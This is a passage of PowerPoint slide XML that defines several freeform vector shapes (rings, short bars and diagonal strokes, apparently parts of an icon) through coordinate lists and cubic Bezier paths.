                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="73"/>
                    <a:pt x="253" y="105"/>
                    <a:pt x="253" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="173"/>
                    <a:pt x="239" y="204"/>
                    <a:pt x="216" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="253"/>
                    <a:pt x="159" y="265"/>
                    <a:pt x="126" y="265"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="63"/>
                    <a:pt x="87" y="71"/>
                    <a:pt x="73" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="100"/>
                    <a:pt x="51" y="119"/>
                    <a:pt x="51" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="159"/>
                    <a:pt x="58" y="178"/>
                    <a:pt x="73" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="222"/>
                    <a:pt x="150" y="222"/>
                    <a:pt x="180" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="178"/>
                    <a:pt x="202" y="159"/>
                    <a:pt x="202" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="119"/>
                    <a:pt x="194" y="100"/>
                    <a:pt x="180" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="71"/>
                    <a:pt x="146" y="63"/>
                    <a:pt x="126"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97" name="Freeform 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F6E7C5-81D1-DB46-A954-34C4AF1A0017}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22232938" y="685800"/>
              <a:ext cx="106363" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 252 h 252"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 215 h 252"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 126 h 252"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 37 h 252"/>
                <a:gd name="T8" fmla="*/ 37 w 253"/>
                <a:gd name="T9" fmla="*/ 37 h 252"/>
                <a:gd name="T10" fmla="*/ 126 w 253"/>
                <a:gd name="T11" fmla="*/ 0 h 252"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 37 h 252"/>
                <a:gd name="T14" fmla="*/ 253 w 253"/>
                <a:gd name="T15" fmla="*/ 126 h 252"/>
                <a:gd name="T16" fmla="*/ 216 w 253"/>
                <a:gd name="T17" fmla="*/ 215 h 252"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 252 h 252"/>
                <a:gd name="T20" fmla="*/ 126 w 253"/>
                <a:gd name="T21" fmla="*/ 50 h 252"/>
                <a:gd name="T22" fmla="*/ 73 w 253"/>
                <a:gd name="T23" fmla="*/ 72 h 252"/>
                <a:gd name="T24" fmla="*/ 73 w 253"/>
                <a:gd name="T25" fmla="*/ 72 h 252"/>
                <a:gd name="T26" fmla="*/ 51 w 253"/>
                <a:gd name="T27" fmla="*/ 126 h 252"/>
                <a:gd name="T28" fmla="*/ 73 w 253"/>
                <a:gd name="T29" fmla="*/ 179 h 252"/>
                <a:gd name="T30" fmla="*/ 180 w 253"/>
                <a:gd name="T31" fmla="*/ 179 h 252"/>
                <a:gd name="T32" fmla="*/ 202 w 253"/>
                <a:gd name="T33" fmla="*/ 126 h 252"/>
                <a:gd name="T34" fmla="*/ 180 w 253"/>
                <a:gd name="T35" fmla="*/ 72 h 252"/>
                <a:gd name="T36" fmla="*/ 126 w 253"/>
                <a:gd name="T37" fmla="*/ 50 h 252"/>
                <a:gd name="T38" fmla="*/ 55 w 253"/>
                <a:gd name="T39" fmla="*/ 55 h 252"/>
                <a:gd name="T40" fmla="*/ 55 w 253"/>
                <a:gd name="T41" fmla="*/ 55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3" h="252">
                  <a:moveTo>
                    <a:pt x="126" y="252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="252"/>
                    <a:pt x="61" y="239"/>
                    <a:pt x="37" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="191"/>
                    <a:pt x="0" y="160"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="60"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="37"/>
                    <a:pt x="37" y="37"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="13"/>
                    <a:pt x="93" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="0"/>
                    <a:pt x="192" y="13"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="60"/>
                    <a:pt x="253" y="92"/>
                    <a:pt x="253" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="160"/>
                    <a:pt x="240" y="191"/>
                    <a:pt x="216" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="239"/>
                    <a:pt x="160" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="50"/>
                    <a:pt x="87" y="58"/>
                    <a:pt x="73" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="72"/>
                    <a:pt x="73" y="72"/>
                    <a:pt x="73" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="87"/>
                    <a:pt x="51" y="106"/>
                    <a:pt x="51" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="146"/>
                    <a:pt x="59" y="165"/>
                    <a:pt x="73" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="208"/>
                    <a:pt x="151" y="208"/>
                    <a:pt x="180" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="165"/>
                    <a:pt x="202" y="146"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="106"/>
                    <a:pt x="194" y="87"/>
                    <a:pt x="180" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="58"/>
                    <a:pt x="147" y="50"/>
                    <a:pt x="126" y="50"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="55"/>
                    <a:pt x="55" y="55"/>
                    <a:pt x="5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98" name="Freeform 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2392F04D-41C0-904D-90E3-41D43E69A5E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22674263" y="241300"/>
              <a:ext cx="106363" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 264 h 264"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 227 h 264"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 138 h 264"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 49 h 264"/>
                <a:gd name="T8" fmla="*/ 37 w 253"/>
                <a:gd name="T9" fmla="*/ 49 h 264"/>
                <a:gd name="T10" fmla="*/ 37 w 253"/>
                <a:gd name="T11" fmla="*/ 49 h 264"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 49 h 264"/>
                <a:gd name="T14" fmla="*/ 253 w 253"/>
                <a:gd name="T15" fmla="*/ 138 h 264"/>
                <a:gd name="T16" fmla="*/ 216 w 253"/>
                <a:gd name="T17" fmla="*/ 227 h 264"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 264 h 264"/>
                <a:gd name="T20" fmla="*/ 126 w 253"/>
                <a:gd name="T21" fmla="*/ 63 h 264"/>
                <a:gd name="T22" fmla="*/ 73 w 253"/>
                <a:gd name="T23" fmla="*/ 85 h 264"/>
                <a:gd name="T24" fmla="*/ 73 w 253"/>
                <a:gd name="T25" fmla="*/ 85 h 264"/>
                <a:gd name="T26" fmla="*/ 51 w 253"/>
                <a:gd name="T27" fmla="*/ 138 h 264"/>
                <a:gd name="T28" fmla="*/ 73 w 253"/>
                <a:gd name="T29" fmla="*/ 192 h 264"/>
                <a:gd name="T30" fmla="*/ 180 w 253"/>
                <a:gd name="T31" fmla="*/ 192 h 264"/>
                <a:gd name="T32" fmla="*/ 202 w 253"/>
                <a:gd name="T33" fmla="*/ 138 h 264"/>
                <a:gd name="T34" fmla="*/ 180 w 253"/>
                <a:gd name="T35" fmla="*/ 85 h 264"/>
                <a:gd name="T36" fmla="*/ 126 w 253"/>
                <a:gd name="T37" fmla="*/ 63 h 264"/>
                <a:gd name="T38" fmla="*/ 55 w 253"/>
                <a:gd name="T39" fmla="*/ 67 h 264"/>
                <a:gd name="T40" fmla="*/ 55 w 253"/>
                <a:gd name="T41" fmla="*/ 67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3" h="264">
                  <a:moveTo>
                    <a:pt x="126" y="264"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="264"/>
                    <a:pt x="62" y="252"/>
                    <a:pt x="37" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="204"/>
                    <a:pt x="0" y="172"/>
                    <a:pt x="0" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="104"/>
                    <a:pt x="13" y="73"/>
                    <a:pt x="37" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="49"/>
                    <a:pt x="37" y="49"/>
                    <a:pt x="37" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="49"/>
                    <a:pt x="37" y="49"/>
                    <a:pt x="37" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="0"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="216" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="73"/>
                    <a:pt x="253" y="104"/>
                    <a:pt x="253" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="172"/>
                    <a:pt x="239" y="204"/>
                    <a:pt x="216" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="252"/>
                    <a:pt x="159" y="264"/>
                    <a:pt x="126" y="264"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="63"/>
                    <a:pt x="87" y="70"/>
                    <a:pt x="73" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="85"/>
                    <a:pt x="73" y="85"/>
                    <a:pt x="73" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="99"/>
                    <a:pt x="51" y="118"/>
                    <a:pt x="51" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="158"/>
                    <a:pt x="58" y="177"/>
                    <a:pt x="73" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="221"/>
                    <a:pt x="150" y="221"/>
                    <a:pt x="180" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="177"/>
                    <a:pt x="202" y="158"/>
                    <a:pt x="202" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="118"/>
                    <a:pt x="194" y="99"/>
                    <a:pt x="180" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="70"/>
                    <a:pt x="146" y="63"/>
                    <a:pt x="126" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="67"/>
                    <a:pt x="55" y="67"/>
                    <a:pt x="55"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199" name="Freeform 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34E86034-8A24-B947-B01C-3BB0144CD988}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22496463" y="239713"/>
              <a:ext cx="20638" cy="69850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 50"/>
                <a:gd name="T1" fmla="*/ 167 h 167"/>
                <a:gd name="T2" fmla="*/ 0 w 50"/>
                <a:gd name="T3" fmla="*/ 141 h 167"/>
                <a:gd name="T4" fmla="*/ 0 w 50"/>
                <a:gd name="T5" fmla="*/ 25 h 167"/>
                <a:gd name="T6" fmla="*/ 25 w 50"/>
                <a:gd name="T7" fmla="*/ 0 h 167"/>
                <a:gd name="T8" fmla="*/ 50 w 50"/>
                <a:gd name="T9" fmla="*/ 25 h 167"/>
                <a:gd name="T10" fmla="*/ 50 w 50"/>
                <a:gd name="T11" fmla="*/ 141 h 167"/>
                <a:gd name="T12" fmla="*/ 25 w 50"/>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50" h="167">
                  <a:moveTo>
                    <a:pt x="25" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="167"/>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="50" y="11"/>
                    <a:pt x="50" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="155"/>
                    <a:pt x="39" y="167"/>
                    <a:pt x="25"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200" name="Freeform 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F258E6-ABCE-8340-A6DA-68B5779CA979}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22496463" y="728663"/>
              <a:ext cx="20638" cy="68263"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 50"/>
                <a:gd name="T1" fmla="*/ 166 h 166"/>
                <a:gd name="T2" fmla="*/ 0 w 50"/>
                <a:gd name="T3" fmla="*/ 141 h 166"/>
                <a:gd name="T4" fmla="*/ 0 w 50"/>
                <a:gd name="T5" fmla="*/ 25 h 166"/>
                <a:gd name="T6" fmla="*/ 25 w 50"/>
                <a:gd name="T7" fmla="*/ 0 h 166"/>
                <a:gd name="T8" fmla="*/ 50 w 50"/>
                <a:gd name="T9" fmla="*/ 25 h 166"/>
                <a:gd name="T10" fmla="*/ 50 w 50"/>
                <a:gd name="T11" fmla="*/ 141 h 166"/>
                <a:gd name="T12" fmla="*/ 25 w 50"/>
                <a:gd name="T13" fmla="*/ 166 h 166"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="50" h="166">
                  <a:moveTo>
                    <a:pt x="25" y="166"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="166"/>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="50" y="11"/>
                    <a:pt x="50" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                    <a:pt x="50" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="155"/>
                    <a:pt x="39" y="166"/>
                    <a:pt x="25"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201" name="Freeform 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6275FFF4-0F91-384B-B696-35765F3935F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22226588" y="508000"/>
              <a:ext cx="69850" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 141 w 167"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 167"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 167"/>
                <a:gd name="T5" fmla="*/ 26 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 167"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 141 w 167"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 167 w 167"/>
                <a:gd name="T11" fmla="*/ 26 h 51"/>
                <a:gd name="T12" fmla="*/ 141 w 167"/>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7" h="51">
                  <a:moveTo>
                    <a:pt x="141" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="0"/>
                    <a:pt x="141" y="0"/>
                    <a:pt x="141" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="0"/>
                    <a:pt x="167" y="12"/>
                    <a:pt x="167" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="40"/>
                    <a:pt x="155" y="51"/>
                    <a:pt x="141"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202" name="Freeform 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C7E68C8-16B4-9B44-A499-7A5A9309F28A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22715538" y="508000"/>
              <a:ext cx="71438" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 141 w 167"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 167"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 167"/>
                <a:gd name="T5" fmla="*/ 26 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 167"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 141 w 167"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 167 w 167"/>
                <a:gd name="T11" fmla="*/ 26 h 51"/>
                <a:gd name="T12" fmla="*/ 141 w 167"/>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167" h="51">
                  <a:moveTo>
                    <a:pt x="141" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="0"/>
                    <a:pt x="141" y="0"/>
                    <a:pt x="141" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="0"/>
                    <a:pt x="167" y="12"/>
                    <a:pt x="167" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="40"/>
                    <a:pt x="155" y="51"/>
                    <a:pt x="141"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203" name="Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80100FEB-2613-7E46-B450-8DD10AD709F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22304375" y="317500"/>
              <a:ext cx="58738" cy="55563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 92 w 138"/>
                <a:gd name="T3" fmla="*/ 128 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 45 h 135"/>
                <a:gd name="T6" fmla="*/ 10 w 138"/>
                <a:gd name="T7" fmla="*/ 10 h 135"/>
                <a:gd name="T8" fmla="*/ 46 w 138"/>
                <a:gd name="T9" fmla="*/ 10 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 92 h 135"/>
                <a:gd name="T12" fmla="*/ 128 w 138"/>
                <a:gd name="T13" fmla="*/ 128 h 135"/>
                <a:gd name="T14" fmla="*/ 110 w 1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35">
                  <a:moveTo>
                    <a:pt x="110" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="135"/>
                    <a:pt x="97" y="133"/>
                    <a:pt x="92" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="45"/>
                    <a:pt x="10" y="45"/>
                    <a:pt x="10" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="36"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="102"/>
                    <a:pt x="138" y="118"/>
                    <a:pt x="128" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="133"/>
                    <a:pt x="117" y="135"/>
                    <a:pt x="110"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204" name="Freeform 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E6B9122-43C4-2A4D-978A-1A6BEBB88518}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22650450" y="661988"/>
              <a:ext cx="58738" cy="57150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 138"/>
                <a:gd name="T1" fmla="*/ 135 h 135"/>
                <a:gd name="T2" fmla="*/ 92 w 138"/>
                <a:gd name="T3" fmla="*/ 127 h 135"/>
                <a:gd name="T4" fmla="*/ 10 w 138"/>
                <a:gd name="T5" fmla="*/ 45 h 135"/>
                <a:gd name="T6" fmla="*/ 10 w 138"/>
                <a:gd name="T7" fmla="*/ 9 h 135"/>
                <a:gd name="T8" fmla="*/ 46 w 138"/>
                <a:gd name="T9" fmla="*/ 9 h 135"/>
                <a:gd name="T10" fmla="*/ 128 w 138"/>
                <a:gd name="T11" fmla="*/ 92 h 135"/>
                <a:gd name="T12" fmla="*/ 128 w 138"/>
                <a:gd name="T13" fmla="*/ 127 h 135"/>
                <a:gd name="T14" fmla="*/ 110 w 1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35">
                  <a:moveTo>
                    <a:pt x="110" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="135"/>
                    <a:pt x="97" y="132"/>
                    <a:pt x="92" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="45"/>
                    <a:pt x="10" y="45"/>
                    <a:pt x="10" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="10" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                    <a:pt x="128" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="102"/>
                    <a:pt x="138" y="118"/>
                    <a:pt x="128" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
